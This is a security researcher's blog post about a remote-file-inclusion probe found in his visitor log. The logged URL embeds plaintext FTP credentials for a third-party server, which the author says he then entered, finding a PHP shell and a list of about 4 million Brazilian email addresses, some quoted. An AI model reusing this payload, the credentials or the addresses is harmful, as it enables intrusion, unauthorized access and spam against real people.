• 1: Home
• 2: Presentations
  • 2.1: Hibernation File Attack
  • 2.2: Stoned Bootkit
  • 2.3: The Rise of MBR Rootkits & Bootkits in the Wild
  • 2.4: Stoned déjà vu - again
• 3: Trainings
  • 3.3: Hibernation File Attack - Reino de España
• 4: Articles
  • 4.1: Polymorphic Encryption Methods
  • 4.2: Writing a Boot Scan Engine
  • 4.3: The Magic of Bootkits
  • 4.4: Analysis of Sinowal
  • 4.5: Advanced Analysis of Sinowal
  • 4.6: Microsofts Rich Header
  • 4.7: Analysis of Conficker
  • 4.8: CIPAV
  • 4.9: Windows Exception Handling
  • 4.10: Pagefile Attack
  • 4.11: Software Watermarking
  • 4.12: Analysis of Stoned
  • 4.13: The Old New Thing About Development
  • 4.14: AntiWPA
  • 4.15: Kon-Boot
  • 4.16: Compiling Shellcode
  • 4.17: Elevated rights, process token and security identifier
  • 4.18: Abusing the TrueCrypt driver
  • 4.19: Nothing new: Msvcrt.dll
  • 4.21: Identifying Source Code
  • 4.22: Analysis of Mebratix
  • 4.23: Popsomp Hills
• 5: Projects
  • 5.1: DiskEdit
  • 5.2: Forensic Deletion Software
    • 5.2.1: Additional Deletion Methods
    • 5.2.2: Visual C++ Source Code
  • 5.3: Forensic Lockdown Software
  • 5.5: Information System
  • 5.6: QuickView
  • 5.7: Smart Boot Manager
  • 5.8: USB View
  • 5.9: Windows 3.1 Emulation
  • 5.10: Windows Boot System
  • 5.11: AV Tracker
  • 5.12: EIPTN
• 6: Services
  • 6.1: Boot-US work
  • 6.2: TeraByte Unlimited work
  • 6.3: EPIGUS work
• 8: Research
  • 8.1: Ascrimez Kit
  • 8.2: Analysing the PDF Exploit
  • 8.3: ZeuS
  • 8.4: infobox.ru: Botnet
  • 8.5: Operating System Development
  • 8.6: 4 million email addresses
• 9: About
  • 9.1: Links
  • 9.3: Peter Kleissner
  • 9.4: Last Modified Pages
  • 9.5: Meeting Points
  • 9.6: Live Search
  • 9.7: Terms of Use
  • 9.8: Contact

4 million email addresses

Everything started with an automatic visit from a bot. From time to time I am looking into my visitor log (on this website here) and get ftp accounts for free:

•A visitor from 187-17-176-3.adllink.com.br (187.17.176.3) came on 2010-06-20 05:05:24. The browser was 
◦This visitor first arrived from 
and visited /index.php?page=ftp://magao@w3fbrazil.com:senhapadrao@w3fbrazil.com/index4.php? encountering a 404 error

Immediately I looked on the ftp to check if there are any interesting security related files (shells, password lists, bots, ...) and got following files:

C:\Company Folders\Investigation Cases\adds>tree /F
Auflistung der Ordnerpfade für Volume Windows 7
Volumeseriennummer : 00000200 4C90:87AA
C:.
    a.php
    add_0.txt
    add_1.txt
    add_2.txt
    add_3.txt
    add_10.txt
    add_11.txt
    ...
    add_3298.txt
    add_3299.txt

a.php is an usual shell which supports execution of commands and has a small file explorer. Those "add" files contain email addresses (1 line one email address), each exactly 2000 mail addresses. There are 1997 add files, making 1997 * 2000 = 3.994.000, nearly 4 million email addresses. Those files are dated to 29.03.2010 18:47 on the server, the shell exists since 18.06.2010 (two days ago). The contents of a file looks like:

af7951@ig.com.br
af80@ig.com.br
af8159y@ig.com.br
af821241@ig.com.br
af8282@ig.com.br
af8@ig.com.br
af8m@ig.com.br
af82@yahoo.com.br
af97ah@badger.ac.brocku.ca

The email addresses are nearly all ending with com.br (brasil). Those mail addresses are surely used for spaming purposes, and I could send them now all "Life is beautiful".